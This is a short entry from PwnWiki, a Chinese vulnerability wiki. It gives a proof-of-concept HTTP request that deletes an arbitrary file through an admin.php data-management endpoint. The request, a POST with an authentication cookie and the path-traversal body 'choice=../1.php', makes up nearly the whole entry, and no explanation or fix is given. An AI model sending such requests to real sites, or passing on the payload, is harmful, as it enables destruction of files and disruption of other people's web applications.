免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
删除1.php
POST/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1 Host: www.kuju.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://www.kuju.com/admin.php?ac=data&fileurl=mana&do=data_import Content-Type:application/x-www-form-urlencoded Content-Length: 37 Origin: http://www.kuju.com Connection: close Cookie:toa_auth=MQk4MWRiMDNkZTA5ZWYxZWIyYjc5NjBkNDNmMWEwY2U3MQ%3D%3D; my_expand_3=;my_expand_all_3= Upgrade-Insecure-Requests: 1 choice=../1.php&do=%E5%88%A0+%E9%99%A4
免费、自由、人人可编辑的漏洞库--pwnwiki.com
